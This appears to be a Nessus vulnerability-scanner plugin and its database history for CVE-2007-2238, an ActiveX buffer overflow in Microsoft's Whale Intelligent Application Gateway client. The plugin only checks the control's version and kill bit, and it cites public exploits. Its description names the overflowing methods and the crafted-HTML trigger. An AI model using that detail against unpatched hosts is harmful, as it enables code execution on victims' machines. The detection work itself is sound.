Microsoft Whale Client Components ActiveX (WhlMgr.dll) Multiple Method Overflows
2009-05-11T00:00:00
ID WHALE_CLIENT_ACTIVEX_3_7_SP2_OVERFLOWS.NASL Type nessus Reporter This script is Copyright (C) 2009-2018 Tenable Network Security, Inc. Modified 2019-11-02T00:00:00
Description
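The version of the Whale Client Components ActiveX control, a component
of the Microsoft Whale Intelligent Application Gateway product and installed
on the remote Windows host, reportedly contains multiple stack-based
buffer overflows that can be triggered using long arguments to the
'CheckForUpdates' and 'UpdateComponents' methods. If an attacker can
trick a user on the affected host into viewing a specially crafted HTML
document, he can leverage these issues to execute arbitrary code on the
affected system subject to the user's privileges.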
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
# Metadata registration: when `description` is true the script only declares
# its identifiers, advisory text, scoring and prerequisites, then exits
# before any of the check logic further down the file runs.
if (description)
{
script_id(38734);
script_version("1.10");
script_cvs_date("Date: 2018/08/06 14:03:16");
# Cross-references that tie a finding from this plugin to public advisories.
script_cve_id("CVE-2007-2238");
script_bugtraq_id(34532);
script_xref(name:"CERT", value:"789121");
script_xref(name:"Secunia", value:"34725");
script_name(english:"Microsoft Whale Client Components ActiveX (WhlMgr.dll) Multiple Method Overflows");
script_summary(english:"Checks version of control");
script_set_attribute(attribute:"synopsis", value:
"The remote Windows host has an ActiveX control that is affected by
multiple buffer overflows.");
script_set_attribute(attribute:"description", value:
"The version of the Whale Client Components ActiveX control, a component
of Microsoft Whale Intelligent Application Gateway product and installed
on the remote Windows host, reportedly contains multiple stack-based
buffer overflows that can be triggered using long arguments to the
'CheckForUpdates' and 'UpdateComponents' methods. If an attacker can
trick a user on the affected host into viewing a specially crafted HTML
document, he can leverage these issues to execute arbitrary code on the
affected system subject to the user's privileges.");
script_set_attribute(attribute:"see_also", value:"http://technet.microsoft.com/en-us/library/dd282918.aspx");
script_set_attribute(attribute:"solution", value:"Upgrade to Microsoft Intelligent Application Gateway 3.7 SP2 or later.");
# CVSS v2 base vector: network access vector, medium access complexity, no
# authentication, complete confidentiality/integrity/availability impact.
# Medium complexity is consistent with the description's requirement that a
# user view a crafted HTML document.
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
# Temporal vector: functional exploit code, official fix, confirmed report.
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
# Exploit-availability metadata; it does not alter the check itself, but it
# is relevant when prioritising remediation of a finding.
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:'D2ExploitPack');
# CWE-119: improper restriction of operations within the bounds of a memory
# buffer, matching the stack-based overflows named in the description.
script_cwe_id(119);
script_set_attribute(attribute:"plugin_publication_date", value:"2009/05/11");
script_set_attribute(attribute:"plugin_type", value:"local");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_family(english:"Windows");
script_copyright(english:"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.");
# Prerequisites: the smb_hotfixes.nasl dependency, the
# "SMB/Registry/Enumerated" knowledge-base key and SMB ports 139/445.
# NOTE(review): the key is presumably populated by the dependency chain
# once the registry has been read over SMB - confirm.
script_dependencies("smb_hotfixes.nasl");
script_require_keys("SMB/Registry/Enumerated");
script_require_ports(139, 445);
# Nothing below this point runs during the description pass.
exit(0);
}
include("global_settings.inc");
include("smb_func.inc");
include("smb_activex_func.inc");
# Check logic: look up the Whale Client Components control by CLSID, compare
# the version of its file with the fixed release and, unless the kill-bit
# test rules it out, raise a finding on the SMB transport port.

# Bail out unless the knowledge base records that the registry was enumerated.
if (!get_kb_item("SMB/Registry/Enumerated")) exit(0);

# Set up the ActiveX helper library; stop quietly if that fails.
if (activex_init() != ACX_OK) exit(0);

# Locate the file used by the control.
clsid = '{8D9563A9-8D5F-459B-87F2-BA842255CB9A}';
file = activex_get_filename(clsid:clsid);
if (file)
{
  version = activex_get_fileversion(clsid:clsid);
  if (version)
  {
    # NOTE(review): the threshold passed as `fix` is "3.7" while the plugin's
    # solution text names 3.7 SP2. Confirm in smb_activex_func.inc how a
    # two-component fix string is compared, so that 3.7 builds older than SP2
    # are classified as intended.
    if (activex_check_fileversion(clsid:clsid, fix:"3.7") == TRUE)
    {
      # Trailer explaining how far the kill-bit test went; it stays NULL when
      # the control should not be reported.
      killbit_note = NULL;
      if (report_paranoia > 1)
      {
        # Paranoid scans report on version alone, so a finding may be raised
        # for a control whose kill bit is already set.
        killbit_note = string(
          "Note, though, that Nessus did not check whether the kill bit was\n",
          "set for the control's CLSID because of the Report Paranoia setting\n",
          "in effect when this scan was run.\n"
        );
      }
      else if (activex_get_killbit(clsid:clsid) == 0)
      {
        # A result of 0 is reported as "kill bit not set", i.e. the control
        # can still be loaded by Internet Explorer.
        killbit_note = string(
          "Moreover, its kill bit is not set so it is accessible via Internet\n",
          "Explorer.\n"
        );
      }

      if (killbit_note)
      {
        report = string(
          "\n",
          "Version ", version, " of the vulnerable control is installed as :\n",
          "\n",
          " ", file, "\n",
          "\n",
          killbit_note
        );

        # The detailed text is attached only when report verbosity is above 0.
        if (report_verbosity > 0)
          security_hole(port:kb_smb_transport(), extra:report);
        else
          security_hole(kb_smb_transport());
      }
    }
  }
}

# Release whatever activex_init() set up.
activex_end();
{"id": "WHALE_CLIENT_ACTIVEX_3_7_SP2_OVERFLOWS.NASL", "bulletinFamily": "scanner", "title": "Microsoft Whale Client Components ActiveX (WhlMgr.dll) Multiple Method Overflows", "description": "The version of the Whale Client Components ActiveX control, a component\nof Microsoft Whale Intelligent Application Gateway product and installed\non the remote Windows host, reportedly contains multiple stack-based\nbuffer overflows that can be triggered using long arguments to the\n", "published": "2009-05-11T00:00:00", "modified": "2019-11-02T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/38734", "reporter": "This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.", "references": ["http://technet.microsoft.com/en-us/library/dd282918.aspx"], "cvelist": ["CVE-2007-2238"], "type": "nessus", "lastseen": "2019-11-03T12:38:43", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2007-2238"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "The version of the Whale Client Components ActiveX control, a component\nof Microsoft Whale Intelligent Application Gateway product and installed\non the remote Windows host, reportedly contains multiple stack-based\nbuffer overflows that can be triggered using long arguments to the\n", "edition": 7, "enchantments": {"dependencies": {"modified": "2019-10-28T21:42:37", "references": [{"idList": ["SSV:5070", "SSV:5062"], "type": "seebug"}, {"idList": ["KLA10392"], "type": "kaspersky"}, {"idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/MSWHALE_CHECKFORUPDATES"], "type": "metasploit"}, {"idList": ["PACKETSTORM:82980"], "type": "packetstorm"}, {"idList": ["VU:789121"], "type": "cert"}, {"idList": ["CVE-2007-2238"], "type": "cve"}, {"idList": ["EDB-ID:16608"], "type": "exploitdb"}, {"idList": ["D2SEC_MSIAG"], "type": "d2"}]}, "score": {"modified": "2019-10-28T21:42:37", "value": 7.6, "vector": "NONE"}}, 
"hash": "486ea293900d842e2b5ad3fe918885361de6d950883f32b895c48aeb86d584ee", "hashmap": [{"hash": "aea23489ce3aa9b6406ebb28e0cda430", "key": "naslFamily"}, {"hash": "6d284b5ee9a2896b99ca4ed3478bd4d1", "key": "href"}, {"hash": "46d2f7c8cafd8aab29cadb7d894022e3", "key": "sourceData"}, {"hash": "c07e25d141000fd1f654a48a4da4334f", "key": "published"}, {"hash": "7a6f822b42e02a0c9da785674dc81360", "key": "description"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d4c25866b8b36bc41e646cbb2f4efdd3", "key": "pluginID"}, {"hash": "7c1f8bce53687c065402b4e712a43db5", "key": "title"}, {"hash": "d4cd6666f171eea3a0b59e991e7695df", "key": "reporter"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0bafb6325bcaf483a25404f785191cc5", "key": "modified"}, {"hash": "62035ad14892310feb62a59b29171a8e", "key": "references"}, {"hash": "b653856ccee7386f956205a29a7ed534", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/38734", "id": "WHALE_CLIENT_ACTIVEX_3_7_SP2_OVERFLOWS.NASL", "lastseen": "2019-10-28T21:42:37", "modified": "2019-10-02T00:00:00", "naslFamily": "Windows", "objectVersion": "1.3", "pluginID": "38734", "published": "2009-05-11T00:00:00", "references": ["http://technet.microsoft.com/en-us/library/dd282918.aspx"], "reporter": "This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(38734);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/08/06 14:03:16\");\n\n script_cve_id(\"CVE-2007-2238\");\n script_bugtraq_id(34532);\n script_xref(name:\"CERT\", value:\"789121\");\n script_xref(name:\"Secunia\", value:\"34725\");\n\n script_name(english:\"Microsoft Whale Client Components ActiveX (WhlMgr.dll) Multiple Method 
Overflows\");\n script_summary(english:\"Checks version of control\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an ActiveX control that is affected by\nmultiple buffer overflows.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the Whale Client Components ActiveX control, a component\nof Microsoft Whale Intelligent Application Gateway product and installed\non the remote Windows host, reportedly contains multiple stack-based\nbuffer overflows that can be triggered using long arguments to the\n'CheckForUpdates' and 'UpdateComponents' methods. If an attacker can\ntrick a user on the affected host into viewing a specially crafted HTML\ndocument, he can leverage these issues to execute arbitrary code on the\naffected system subject to the user's privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/library/dd282918.aspx\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Microsoft Intelligent Application Gateway 3.7 SP2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n \n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_activex_func.inc\");\n\n\nif (!get_kb_item(\"SMB/Registry/Enumerated\")) exit(0);\n\n\n# Locate the file used by the controls.\nif (activex_init() != ACX_OK) exit(0);\n\nclsid = '{8D9563A9-8D5F-459B-87F2-BA842255CB9A}';\nfile = activex_get_filename(clsid:clsid);\nif (file)\n{\n version = activex_get_fileversion(clsid:clsid);\n\n if (version && activex_check_fileversion(clsid:clsid, fix:\"3.7\") == TRUE)\n {\n report = NULL;\n if (report_paranoia > 1)\n report = string(\n \"\\n\",\n \"Version \", version, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Note, though, that Nessus did not check whether the kill bit was\\n\",\n \"set for the control's CLSID because of the Report Paranoia setting\\n\",\n \"in effect when this scan was run.\\n\"\n );\n else if (activex_get_killbit(clsid:clsid) == 0)\n report = string(\n \"\\n\",\n \"Version \", version, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Moreover, its kill bit is not set so it is accessible via Internet\\n\",\n \"Explorer.\\n\"\n );\n if (report)\n {\n if (report_verbosity > 0) security_hole(port:kb_smb_transport(), extra:report);\n else security_hole(kb_smb_transport());\n }\n }\n}\nactivex_end();\n", "title": "Microsoft Whale Client Components ActiveX (WhlMgr.dll) Multiple Method Overflows", "type": "nessus", "viewCount": 43}, "differentElements": ["modified"], "edition": 7, "lastseen": "2019-10-28T21:42:37"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2007-2238"], 
"cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The version of the Whale Client Components ActiveX control, a component\nof Microsoft Whale Intelligent Application Gateway product and installed\non the remote Windows host, reportedly contains multiple stack-based\nbuffer overflows that can be triggered using long arguments to the\n'CheckForUpdates' and 'UpdateComponents' methods. If an attacker can\ntrick a user on the affected host into viewing a specially crafted HTML\ndocument, he can leverage these issues to execute arbitrary code on the\naffected system subject to the user's privileges.", "edition": 5, "enchantments": {"dependencies": {"modified": "2019-01-16T20:09:17", "references": [{"idList": ["SSV:5070", "SSV:5062"], "type": "seebug"}, {"idList": ["KLA10392"], "type": "kaspersky"}, {"idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/MSWHALE_CHECKFORUPDATES"], "type": "metasploit"}, {"idList": ["PACKETSTORM:82980"], "type": "packetstorm"}, {"idList": ["VU:789121"], "type": "cert"}, {"idList": ["CVE-2007-2238"], "type": "cve"}, {"idList": ["EDB-ID:16608"], "type": "exploitdb"}, {"idList": ["D2SEC_MSIAG"], "type": "d2"}]}, "score": {"value": 9.3, "vector": "NONE"}}, "hash": "cdcf45587cefc792981d76e4cfadc8336c6c4fd7529dcfefb996a809da44c95f", "hashmap": [{"hash": "50801dedadcc0c1943d34972f3bdbd78", "key": "description"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "aea23489ce3aa9b6406ebb28e0cda430", "key": "naslFamily"}, {"hash": "46d2f7c8cafd8aab29cadb7d894022e3", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "06d31ea75ce174bd6e8a2331e24a21c2", "key": "modified"}, {"hash": "c07e25d141000fd1f654a48a4da4334f", "key": "published"}, {"hash": "d4c25866b8b36bc41e646cbb2f4efdd3", "key": "pluginID"}, {"hash": "7c1f8bce53687c065402b4e712a43db5", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, 
{"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "62035ad14892310feb62a59b29171a8e", "key": "references"}, {"hash": "b653856ccee7386f956205a29a7ed534", "key": "cvelist"}, {"hash": "a7fc0f0e1eb40af998b9f33578ab979c", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=38734", "id": "WHALE_CLIENT_ACTIVEX_3_7_SP2_OVERFLOWS.NASL", "lastseen": "2019-01-16T20:09:17", "modified": "2018-08-06T00:00:00", "naslFamily": "Windows", "objectVersion": "1.3", "pluginID": "38734", "published": "2009-05-11T00:00:00", "references": ["http://technet.microsoft.com/en-us/library/dd282918.aspx"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(38734);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/08/06 14:03:16\");\n\n script_cve_id(\"CVE-2007-2238\");\n script_bugtraq_id(34532);\n script_xref(name:\"CERT\", value:\"789121\");\n script_xref(name:\"Secunia\", value:\"34725\");\n\n script_name(english:\"Microsoft Whale Client Components ActiveX (WhlMgr.dll) Multiple Method Overflows\");\n script_summary(english:\"Checks version of control\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an ActiveX control that is affected by\nmultiple buffer overflows.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the Whale Client Components ActiveX control, a component\nof Microsoft Whale Intelligent Application Gateway product and installed\non the remote Windows host, reportedly contains multiple stack-based\nbuffer overflows that can be triggered using long arguments to the\n'CheckForUpdates' and 'UpdateComponents' methods. 
If an attacker can\ntrick a user on the affected host into viewing a specially crafted HTML\ndocument, he can leverage these issues to execute arbitrary code on the\naffected system subject to the user's privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/library/dd282918.aspx\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Microsoft Intelligent Application Gateway 3.7 SP2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_activex_func.inc\");\n\n\nif (!get_kb_item(\"SMB/Registry/Enumerated\")) exit(0);\n\n\n# Locate the file used by the controls.\nif (activex_init() != ACX_OK) exit(0);\n\nclsid = '{8D9563A9-8D5F-459B-87F2-BA842255CB9A}';\nfile = 
activex_get_filename(clsid:clsid);\nif (file)\n{\n version = activex_get_fileversion(clsid:clsid);\n\n if (version && activex_check_fileversion(clsid:clsid, fix:\"3.7\") == TRUE)\n {\n report = NULL;\n if (report_paranoia > 1)\n report = string(\n \"\\n\",\n \"Version \", version, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Note, though, that Nessus did not check whether the kill bit was\\n\",\n \"set for the control's CLSID because of the Report Paranoia setting\\n\",\n \"in effect when this scan was run.\\n\"\n );\n else if (activex_get_killbit(clsid:clsid) == 0)\n report = string(\n \"\\n\",\n \"Version \", version, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Moreover, its kill bit is not set so it is accessible via Internet\\n\",\n \"Explorer.\\n\"\n );\n if (report)\n {\n if (report_verbosity > 0) security_hole(port:kb_smb_transport(), extra:report);\n else security_hole(kb_smb_transport());\n }\n }\n}\nactivex_end();\n", "title": "Microsoft Whale Client Components ActiveX (WhlMgr.dll) Multiple Method Overflows", "type": "nessus", "viewCount": 32}, "differentElements": ["description"], "edition": 5, "lastseen": "2019-01-16T20:09:17"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2007-2238"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The version of the Whale Client Components ActiveX control, a component of Microsoft Whale Intelligent Application Gateway product and installed on the remote Windows host, reportedly contains multiple stack-based buffer overflows that can be triggered using long arguments to the 'CheckForUpdates' and 'UpdateComponents' methods. 
If an attacker can trick a user on the affected host into viewing a specially crafted HTML document, he can leverage these issues to execute arbitrary code on the affected system subject to the user's privileges.", "edition": 4, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "hash": "5734d4552f61eccc66f393ab61a6db437c80b8e8090c5a6b5d9ef129c717d56a", "hashmap": [{"hash": "44a0c05534101e7e4ec146f0b881b8c9", "key": "description"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "aea23489ce3aa9b6406ebb28e0cda430", "key": "naslFamily"}, {"hash": "46d2f7c8cafd8aab29cadb7d894022e3", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "06d31ea75ce174bd6e8a2331e24a21c2", "key": "modified"}, {"hash": "c07e25d141000fd1f654a48a4da4334f", "key": "published"}, {"hash": "d4c25866b8b36bc41e646cbb2f4efdd3", "key": "pluginID"}, {"hash": "7c1f8bce53687c065402b4e712a43db5", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "62035ad14892310feb62a59b29171a8e", "key": "references"}, {"hash": "b653856ccee7386f956205a29a7ed534", "key": "cvelist"}, {"hash": "a7fc0f0e1eb40af998b9f33578ab979c", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=38734", "id": "WHALE_CLIENT_ACTIVEX_3_7_SP2_OVERFLOWS.NASL", "lastseen": "2018-09-01T23:49:51", "modified": "2018-08-06T00:00:00", "naslFamily": "Windows", "objectVersion": "1.3", "pluginID": "38734", "published": "2009-05-11T00:00:00", "references": ["http://technet.microsoft.com/en-us/library/dd282918.aspx"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(38734);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/08/06 14:03:16\");\n\n 
script_cve_id(\"CVE-2007-2238\");\n script_bugtraq_id(34532);\n script_xref(name:\"CERT\", value:\"789121\");\n script_xref(name:\"Secunia\", value:\"34725\");\n\n script_name(english:\"Microsoft Whale Client Components ActiveX (WhlMgr.dll) Multiple Method Overflows\");\n script_summary(english:\"Checks version of control\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an ActiveX control that is affected by\nmultiple buffer overflows.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the Whale Client Components ActiveX control, a component\nof Microsoft Whale Intelligent Application Gateway product and installed\non the remote Windows host, reportedly contains multiple stack-based\nbuffer overflows that can be triggered using long arguments to the\n'CheckForUpdates' and 'UpdateComponents' methods. If an attacker can\ntrick a user on the affected host into viewing a specially crafted HTML\ndocument, he can leverage these issues to execute arbitrary code on the\naffected system subject to the user's privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/library/dd282918.aspx\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Microsoft Intelligent Application Gateway 3.7 SP2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n 
script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_activex_func.inc\");\n\n\nif (!get_kb_item(\"SMB/Registry/Enumerated\")) exit(0);\n\n\n# Locate the file used by the controls.\nif (activex_init() != ACX_OK) exit(0);\n\nclsid = '{8D9563A9-8D5F-459B-87F2-BA842255CB9A}';\nfile = activex_get_filename(clsid:clsid);\nif (file)\n{\n version = activex_get_fileversion(clsid:clsid);\n\n if (version && activex_check_fileversion(clsid:clsid, fix:\"3.7\") == TRUE)\n {\n report = NULL;\n if (report_paranoia > 1)\n report = string(\n \"\\n\",\n \"Version \", version, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Note, though, that Nessus did not check whether the kill bit was\\n\",\n \"set for the control's CLSID because of the Report Paranoia setting\\n\",\n \"in effect when this scan was run.\\n\"\n );\n else if (activex_get_killbit(clsid:clsid) == 0)\n report = string(\n \"\\n\",\n \"Version \", version, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Moreover, its kill bit is not set so it is accessible via Internet\\n\",\n \"Explorer.\\n\"\n );\n if (report)\n {\n if (report_verbosity > 0) security_hole(port:kb_smb_transport(), extra:report);\n else security_hole(kb_smb_transport());\n }\n }\n}\nactivex_end();\n", "title": 
"Microsoft Whale Client Components ActiveX (WhlMgr.dll) Multiple Method Overflows", "type": "nessus", "viewCount": 31}, "differentElements": ["description"], "edition": 4, "lastseen": "2018-09-01T23:49:51"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2007-2238"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The version of the Whale Client Components ActiveX control, a component of Microsoft Whale Intelligent Application Gateway product and installed on the remote Windows host, reportedly contains multiple stack-based buffer overflows that can be triggered using long arguments to the 'CheckForUpdates' and 'UpdateComponents' methods. If an attacker can trick a user on the affected host into viewing a specially crafted HTML document, he can leverage these issues to execute arbitrary code on the affected system subject to the user's privileges.", "edition": 6, "enchantments": {"dependencies": {"modified": "2019-02-21T01:11:53", "references": [{"idList": ["SSV:5070", "SSV:5062"], "type": "seebug"}, {"idList": ["KLA10392"], "type": "kaspersky"}, {"idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/MSWHALE_CHECKFORUPDATES"], "type": "metasploit"}, {"idList": ["PACKETSTORM:82980"], "type": "packetstorm"}, {"idList": ["VU:789121"], "type": "cert"}, {"idList": ["CVE-2007-2238"], "type": "cve"}, {"idList": ["EDB-ID:16608"], "type": "exploitdb"}, {"idList": ["D2SEC_MSIAG"], "type": "d2"}]}, "score": {"modified": "2019-02-21T01:11:53", "value": 8.4, "vector": "NONE"}}, "hash": "5734d4552f61eccc66f393ab61a6db437c80b8e8090c5a6b5d9ef129c717d56a", "hashmap": [{"hash": "44a0c05534101e7e4ec146f0b881b8c9", "key": "description"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "aea23489ce3aa9b6406ebb28e0cda430", "key": "naslFamily"}, {"hash": "46d2f7c8cafd8aab29cadb7d894022e3", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": 
"06d31ea75ce174bd6e8a2331e24a21c2", "key": "modified"}, {"hash": "c07e25d141000fd1f654a48a4da4334f", "key": "published"}, {"hash": "d4c25866b8b36bc41e646cbb2f4efdd3", "key": "pluginID"}, {"hash": "7c1f8bce53687c065402b4e712a43db5", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "62035ad14892310feb62a59b29171a8e", "key": "references"}, {"hash": "b653856ccee7386f956205a29a7ed534", "key": "cvelist"}, {"hash": "a7fc0f0e1eb40af998b9f33578ab979c", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=38734", "id": "WHALE_CLIENT_ACTIVEX_3_7_SP2_OVERFLOWS.NASL", "lastseen": "2019-02-21T01:11:53", "modified": "2018-08-06T00:00:00", "naslFamily": "Windows", "objectVersion": "1.3", "pluginID": "38734", "published": "2009-05-11T00:00:00", "references": ["http://technet.microsoft.com/en-us/library/dd282918.aspx"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(38734);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/08/06 14:03:16\");\n\n 